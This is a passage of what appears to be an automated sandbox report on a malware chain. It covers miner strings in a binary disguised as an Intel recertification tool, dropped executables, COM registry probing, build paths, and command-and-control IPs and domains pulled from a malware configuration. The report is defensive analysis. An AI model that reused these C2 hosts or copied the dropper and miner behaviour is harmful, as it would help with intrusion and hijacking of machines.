                        Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
                        Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: cryptonight/0
                        Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
                        Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.269549192591.000002AFB8010000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://

                        Compliance

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\1015079001\Bxq1jd2.exeUnpacked PE file: 48.2.Bxq1jd2.exe.400000.0.unpack
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Google\Chrome\Extensions
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\graph
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\graph\graph.exe
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
                        Source: C:\Users\user\AppData\Local\Temp\1014759001\LoaderClient.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI85002\wheel-0.43.0.dist-info\LICENSE.txt
                        Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdbNN source: LoaderClient.exe, 0000002E.00000003.269782910984.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\_asyncio.pdb source: LoaderClient.exe, 0000002E.00000003.269781086691.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdb source: LoaderClient.exe, 0000002E.00000003.269782910984.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\sqlite3.pdb source: LoaderClient.exe, 0000002F.00000002.269889838631.00007FFBB35E2000.00000002.00000001.01000000.00000042.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\_multiprocessing.pdb source: LoaderClient.exe, 0000002E.00000003.269783180111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\select.pdb source: LoaderClient.exe, 0000002E.00000003.269799420971.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269901766931.00007FFBE1BC3000.00000002.00000001.01000000.0000001D.sdmp
                        Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.10\Release\win32trace.pdb source: LoaderClient.exe, 0000002E.00000003.269801841133.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: dwVrTdy.exe, 00000026.00000003.269623319835.0000022434342000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269648198814.00000256362AF000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000002A.00000002.269645091434.00007FF70FBE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002A.00000000.269623648243.00007FF70FBE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002C.00000000.269648966759.00007FF734C79000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002D.00000000.269753453267.00007FF734C79000.00000002.00000001.01000000.00000013.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\unicodedata.pdb source: LoaderClient.exe, 0000002E.00000003.269800856606.0000023A40630000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269890200730.00007FFBB373C000.00000002.00000001.01000000.00000040.sdmp
                        Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: dwVrTdy.exe, 00000026.00000000.269552412414.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000026.00000002.269642733373.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000002.269666668507.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000000.269569842082.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, AzVRM7c.exe, 00000029.00000002.269642585095.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, AzVRM7c.exe, 00000029.00000000.269596958142.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, t5abhIx.exe, 0000002B.00000000.269642377943.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp
                        Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: dwVrTdy.exe, 00000026.00000000.269552412414.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000026.00000002.269642733373.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000002.269666668507.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000000.269569842082.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, AzVRM7c.exe, 00000029.00000002.269642585095.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, AzVRM7c.exe, 00000029.00000000.269596958142.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, t5abhIx.exe, 0000002B.00000000.269642377943.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\_socket.pdb source: LoaderClient.exe, 0000002E.00000003.269784461654.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: LoaderClient.exe, 0000002F.00000002.269891937465.00007FFBB399F000.00000002.00000001.01000000.00000026.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\python3.pdb source: LoaderClient.exe, 0000002E.00000003.269792403014.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269878316296.00000178E9C30000.00000002.00000001.01000000.00000019.sdmp
                        Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: LoaderClient.exe, 0000002E.00000003.269780776101.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.10\Release\_win32sysloader.pdb source: LoaderClient.exe, 0000002E.00000003.269785646619.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\_queue.pdb source: LoaderClient.exe, 0000002E.00000003.269784263111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\_overlapped.pdb source: LoaderClient.exe, 0000002E.00000003.269783360100.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\_bz2.pdb source: LoaderClient.exe, 0000002E.00000003.269781338858.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269900030970.00007FFBE131D000.00000002.00000001.01000000.0000001F.sdmp
                        Source: Binary string: C:\A\40\b\bin\amd64\_hashlib.pdb source: LoaderClient.exe, 0000002E.00000003.269782686037.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269899355718.00007FFBE12F6000.00000002.00000001.01000000.00000025.sdmp
                        Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: dwVrTdy.exe, 00000026.00000003.269623319835.0000022434342000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269648198814.00000256362AF000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000002A.00000002.269645091434.00007FF70FBE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002A.00000000.269623648243.00007FF70FBE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002C.00000000.269648966759.00007FF734C79000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002D.00000000.269753453267.00007FF734C79000.00000002.00000001.01000000.00000013.sdmp
                        Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: LoaderClient.exe, 0000002F.00000002.269891937465.00007FFBB399F000.00000002.00000001.01000000.00000026.sdmp
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                        Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B57978 FindFirstFileW,FindFirstFileW,free,12_2_00B57978
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 12_2_00B5881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,12_2_00B5881C
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior

                        Networking

                        barindex
                        Source: Malware configuration extractorIPs: 185.215.113.16
                        Source: Malware configuration extractorURLs: print-vexer.biz
                        Source: Malware configuration extractorURLs: dwell-exclaim.biz
                        Source: Malware configuration extractorURLs: se-blurry.biz
                        Source: Malware configuration extractorURLs: impend-differ.biz
                        Source: Malware configuration extractorURLs: covery-mover.biz
                        Source: Malware configuration extractorURLs: formy-spill.biz
                        Source: Malware configuration extractorURLs: drive-connect.cyou
                        Source: Malware configuration extractorURLs: zinc-sneark.biz
                        Source: Malware configuration extractorURLs: dare-curbys.biz
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1015130001\EkmIhQM.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\EkmIhQM[1].exe, type: DROPPED
                        Source: Joe Sandbox ViewIP Address: 185.215.113.43 185.215.113.43
                        Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                        Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0066E0C0 recv,recv,recv,recv,0_2_0066E0C0
                        Source: dwVrTdy.exe, 00000026.00000003.269574618681.0000022432672000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269574954679.0000022432670000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576629725.00000224326CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
                        Source: t5abhIx.exe, 0000002B.00000003.269664517694.000001B3EE912000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667057629.000001B3EE91E000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664675085.000001B3EE919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com" equals www.youtube.com (Youtube)
                        Source: dwVrTdy.exe, 00000026.00000003.269575949118.000002243262B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575302125.0000022432627000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575735102.000002243262A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com"}},"current_locale":"en","default_local,~ equals www.youtube.com (Youtube)
                        Source: dwVrTdy.exe, 00000028.00000003.269593403578.0000025635665000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592748308.0000025635635000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com1 equals www.youtube.com (Youtube)
